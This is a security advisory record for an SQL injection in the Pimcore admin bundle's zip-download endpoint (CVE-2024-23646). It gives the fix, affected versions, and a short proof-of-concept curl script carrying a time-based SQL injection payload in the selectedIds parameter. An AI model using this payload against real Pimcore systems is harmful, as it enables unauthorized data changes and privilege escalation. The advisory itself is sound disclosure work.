{"id":"GHSA-cwx6-4wmf-c6xv","summary":"SQL Injection in Admin download files as zip","details":"### Summary\nThe application allows to create zip files from available files on the site. The parameter \"selectedIds\", is susceptible to SQL Injection.\n\n### Details\n[downloadAsZipJobsAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006) escape parameters, but [downloadAsZipAddFilesAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087) not.\nThe following code should be added:\n```\n  foreach ($selectedIds as $selectedId) {\n      if ($selectedId) {\n          $quotedSelectedIds[] = $db-\u003equote($selectedId);\n      }\n  }\n```\n\n### PoC\n\n- Set up an example project as described on https://github.com/pimcore/demon (demo package with example content)\n- Log In. Grab the `X-pimcore-csrf-token` header from any request to the backend, as well as the `PHPSESSID` cookie.\n- Run the following script, substituting the values accordingly: \n```\n#!/bin/bash\nBASE_URL=http://localhost # REPLACE THIS!\nCSRF_TOKEN=\"5133f9d5d28de7dbab39e33ac7036271284ee42e\" # REPLACE THIS!\nCOOKIE=\"PHPSESSID=4312797207ba3b342b29218fa42f3aa3\" # REPLACE THIS!\nSQL=\"(select*from(select(sleep(6)))a)\"\n\ncurl \"${BASE_URL}/admin/asset/download-as-zip-add-files?_dc=1700573579093&id=1&selectedIds=1,${SQL}&offset=10&limit=5&jobId=655cb18a37b01\" \\\n    -X GET \\\n    -H \"X-pimcore-csrf-token: ${CSRF_TOKEN}\" \\\n    -H \"Cookie: ${COOKIE}\" `\n```\n- The response is delayed by 6 seconds.\n\n### Impact\nAny backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level.\n","aliases":["CVE-2024-23646"],"modified":"2026-09-10T03:49:59.705576221Z","published":"2024-01-24T20:54:15Z","database_specific":{"cwe_ids":["CWE-89"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2024-01-24T20:54:15Z","nvd_published_at":"2024-01-24T20:15:53Z"},"references":[{"type":"WEB","url":"https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-cwx6-4wmf-c6xv"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2024-23646"},{"type":"WEB","url":"https://github.com/pimcore/admin-ui-classic-bundle/commit/363afef29496cc40a8b863c2ca2338979fcf50a8"},{"type":"PACKAGE","url":"https://github.com/pimcore/admin-ui-classic-bundle"},{"type":"WEB","url":"https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006"},{"type":"WEB","url":"https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087"},{"type":"WEB","url":"https://github.com/pimcore/admin-ui-classic-bundle/releases/tag/v1.3.2"}],"affected":[{"package":{"name":"pimcore/admin-ui-classic-bundle","ecosystem":"Packagist","purl":"pkg:composer/pimcore/admin-ui-classic-bundle"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"1.0.0"},{"fixed":"1.3.2"}]}],"versions":["v1.0.0","v1.0.1","v1.0.2","v1.0.3","v1.0.4","v1.0.5","v1.0.6","v1.1.0","v1.1.0-RC1","v1.1.1","v1.1.2","v1.1.3","v1.1.4","v1.2","v1.2.0-RC1","v1.2.1","v1.2.2","v1.2.3","v1.3.0","v1.3.0-RC1","v1.3.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-cwx6-4wmf-c6xv/GHSA-cwx6-4wmf-c6xv.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}]}